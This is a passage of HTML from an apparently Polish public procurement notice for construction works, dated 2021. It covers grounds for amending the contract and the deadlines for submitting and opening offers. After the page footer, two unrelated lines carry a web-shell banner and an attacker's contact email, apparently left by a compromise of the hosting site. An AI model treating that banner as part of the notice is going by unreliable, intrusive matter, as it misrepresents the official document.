class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a)zmianę podwykonawcy wskazanego w ofercie na innego podwykonawcę, jak również powierzenie podwykonawcom innej części zamówienia niż wskazana w ofercie Wykonawcy, za uprzednią zgodą Zamawiającego. b) Siła Wyższa uniemożliwiająca wykonanie Przedmiotu Umowy, Strona dotknięta jej działaniem zobowiązana jest powiadomić drugą Stronę o jej wystąpieniu. c)kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami powodującymi uniemożliwienie lub znaczne utrudnienie w prowadzeniu– zmiany zostaną ograniczone do uniknięcia lub usunięcia tych kolizji. Dopuszczalna zmiana terminu realizacji o czas, w którym wyżej opisane kolizje uniemożliwiają lub w znacznym stopniu utrudniają prowadzenie prac; d)konieczności zrealizowania jakiejkolwiek części robót, objętych Przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji, których nie można było stwierdzić przed rozpoczęciem prac. Zmiana sposobu realizacji Przedmiotu umowy będzie adekwatna do wprowadzonych zmian. Dopuszczalna zmiana wynagrodzenia, oraz terminu realizacji wynikającą z konieczności zastosowania odmiennych rozwiązań i wprowadzenia zmian w dokumentacji projektowej, e)warunki geologiczne, geotechniczne lub hydrologiczne, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów. Dopuszczalna zmiana wysokości wynagrodzenia i zmianę terminu realizacji Umowy, o czas związany koniecznością dostosowania prac do nowych warunków,f) warunki terenowe, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych, o ile będzie miała wpływ na realizację Umowy. Dopuszczalna zmiana terminu realizacji umowy i wynagrodzenia, o czas związany z koniecznością dostosowania prac do nowych warunków, g)Zastosowanie innych rozwiązań technicznych lub innych metod budowy niż wskazane w dok. projektowej, gdyby mogło to przynieść oszczędności Zamawiającemu lub gdyby zastosowanie przewidzianych w dokumentacji projektowej rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Przedmiotu Umowy, h)nadzwyczajne warunki atmosferyczne: - niskie temperatury powietrza (tzn. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-27 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem miniPortalu, adres: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-27 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-26</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com